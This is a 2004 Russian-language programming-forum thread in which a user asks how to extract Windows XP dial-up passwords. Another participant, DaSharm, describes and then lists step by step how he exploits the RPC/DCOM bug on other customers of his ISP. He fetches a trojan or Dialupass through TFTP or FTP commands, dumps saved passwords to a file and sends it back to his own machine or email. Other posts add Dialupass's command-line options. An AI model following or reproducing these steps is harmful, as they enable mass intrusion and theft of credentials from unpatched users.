| Вопрос: DialUP password in XP !!! | Добавлено: 18.04.04 23:50 |
Автор вопроса:  HACKER
|
| 100 раз уже это было на форуме, но толи никто незнает, или все кто знает жадины. Теперь вопрос хочу поставить подругому. Есть одна прога которая всё же прекрасно показует эти самые пароли, они наверника хранятся в системе где то далеко, а может и нет, но зашифрованы. А если бы мне кто-то подсказал что нужно экспортировать с реестра и какие файлы надо скопировать, чтобы полностью, со всеми его настройками (и паролями), сохранить скажем на дискету (или в другую папку). Вообщем надо просто скопировать то "ШО ТО", потом на другом компе, вставить туда же где это стояло но компе с которого скопировали. Подскажите плз, что б скопировать! |
| Ответы | Всего ответов: 49 |
|
Номер ответа: 1 Автор ответа:  Sharp Лидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #1 | Добавлено: 19.04.04 01:29 |
|
Спроси на securitylab.ru, hackdocs.host.kz. Это все-таки форум по программированию, а не по взлому. |
||
|
Номер ответа: 2 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #2 | Добавлено: 19.04.04 07:40 |
|
А тебе не приходило в голову запихнуть Dialupass в ресурсы и юзать из командной строки?Три дня назад я сделал такое и распостранил по RPC\DCOM багу на територии своего провайдера.Супер!Теперь у меня много паролей от разных подключений! |
||
|
Номер ответа: 3 Автор ответа: SharpЛидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #3 | Добавлено: 19.04.04 08:15 |
|
Злодей Но это же некрасиво - запихивать чужую программу в ресурсы, а потом вызывать ее из командной строки? Хоть бы отдизасмил ее для очистки совести А что, пров не поставил себе даже патч на RPC DCOM? Если такое повсместно, то я летом тоже займусь этим делом |
||
|
Номер ответа: 4 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #4 | Добавлено: 20.04.04 00:09 |
|
Нє, пров мой не[sensored], а вот юзверя -[sensored]усы настоящие!Я их и сканю KaHT-ом, а потом пуляю через TFTP свой вирь им, вирь запускает из ресурсов dialupass и сохраняет все пароли в текстовом файле, отсылает мне на почту и удаляет dialupass и текстовый файл из компа жертвы.Все просто и прикольно, скоро напишу червь, который крадет аси и сам распостраняется через RPC\DCOM баг (типа BLAST).Миграция между сетями - по почте.Ваще я переписал весь RPC\DCOM експлоит на ВБ, смотрится прикольно, будет на моем сайте.Удачи всем. |
||
|
Номер ответа: 5 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #5 | Добавлено: 20.04.04 18:14 |
| А какакие параметры коммандной стороки у Dialupass ? Если не секрет и вообще поделись твоим творением | ||
|
Номер ответа: 6 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #6 | Добавлено: 20.04.04 22:16 |
|
Мне смешно смотреть на твой ник, я не уважаю людей, которые не оправдывают своё название.Параметры Диалапасс в хелпе от самой диалапасс, а о способах учись на web-hack.ru и securitylab.ru.Поделится могу только прогой, которая отсылает пассы на почту, експлоит на ВБ пока никому не дам (на С++ себе скачаешь). |
||
|
Номер ответа: 7 Автор ответа: SharpЛидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #7 | Добавлено: 21.04.04 02:36 |
|
А ты шеллкод сам правил на запуск (закачку?) твоего трояна или есть такой готовый? Если готовый, где взял? |
||
|
Номер ответа: 8 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #8 | Добавлено: 21.04.04 23:29 |
|
Понимаешь, РПЦ експлоит переполняет буфер в месенджере и биндит шелл (т. е. командную строку) на указанном порту. После етого ты просто коннектишся к етому порту и...полная DOS власть!Выходит, не нужно никакой предварительной троянизации компа, просто вводишь айпи и бац!После етого нужно как-то из командной строки загрузить что-то на комп ламера, я знаю три способа, реально документированые два: FTP, TFTP.Итак, запускаю у себя ТФТП сервер и на компе ламера командой TFTP -i xxx.xxx.xxx.xxx GET trojan.exe гружу из своего компа троян.После етого командой start trojan.exe запускаю его...Правда, сегодня говорил со своим однокласником, он работает по ФТП, и у него все очень быстро (никаких троянов, грузит голый Dialupass и потом скачивает созданный файл с паролями), где - то 0.5 - 1 минута на хак одного компа. |
||
|
Номер ответа: 9 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #9 | Добавлено: 21.04.04 23:46 |
| Вот жадина! На ник он смотрит, а ты несмотри! Быть может я только начинающий, или вообще это просто ник. Да и лет мне меньше чем всем вам, я может много ещё и незнаю, и что? зачем уприкать меня в этом, я пока в процессе обучения. А ты если жлоб то так и скажи! | ||
|
Номер ответа: 10 Автор ответа: SharpЛидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #10 | Добавлено: 21.04.04 23:49 |
|
А да, вспомнил, эта штука была в GUI RPC Exploit |
||
|
Номер ответа: 11 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #11 | Добавлено: 22.04.04 00:03 |
| Шутки это хорошо, но вот если бы параметры коммандной строки узнать. Смотрел там ридми, там описано только /adv, но оно нечего недаёт | ||
|
Номер ответа: 12 Автор ответа: ПавелАдминистратор ICQ: 326066673 Вопросов: 368 Ответов: 5968 |
Web-сайт: Профиль | | #12 | Добавлено: 22.04.04 10:49 |
|
Читай справку. Там английским по белому написано: Command-Line Options Option Description /stext <Filename> Save the list of all dial-up items into a regular text file. /stab <Filename> Save the list of all dial-up items into a tab-delimited text file. /stabular <Filename> Save the list of all dial-up items into a tabular text file. /shtml <Filename> Save the list of all dial-up items into horizontal HTML file. /sverhtml <Filename> Save the list of all dial-up items into vertical HTML file. |
||
|
Номер ответа: 13 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #13 | Добавлено: 22.04.04 22:57 |
| Блин, по пальцам:1.Скачиваешь тот же DCOM RPC Exploit GUI2.Сканируешь зону действия своего прова на открытые 135 порты (если хоч, я сканер уже написал, могу исходник дать)3.Сканер находит айпи адреса, тыкаешь их в DCOM RPC Exploit GUI и жмешь exploit!4.В DCOM RPC Exploit GUI есть встроенный FTP сервер, запускаешь.В полученной командной строке пишешь: FTPopen свой_IPpasswordget dialupass.exequit5.Теперь в експлоите пишешь: dialupass.exe /allusers /stext BBB.txt6.После етого:FTPopen свой_IPpasswordPUT BBB.txtquit7.Смотришь в директорию DCOM RPC Exploit GUI и там увидишь BBB.txt со всеми пасвордами.П.С. мне 15 лет, послезавтра будет 16. | ||
|
Номер ответа: 14 Автор ответа:  SharpЛидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #14 | Добавлено: 23.04.04 05:48 |
|
Вот из-за таких, как DaSharm, нормальные люди деньги переплачивают за Инет |
||
|
Номер ответа: 15 Автор ответа:  sneРазработчик Offline Client ICQ: 233286456 Вопросов: 34 Ответов: 5445 |
Web-сайт: Профиль | | #15 | Добавлено: 23.04.04 12:54 |
|
Странная эта щтука dialpass, в дебагере работать не может, все пароли становятся обычными звездочками... Это я правда пробовал только IDA 4.5 (теперь там есть и win32 дебаггер) и в OlyDebug... |
||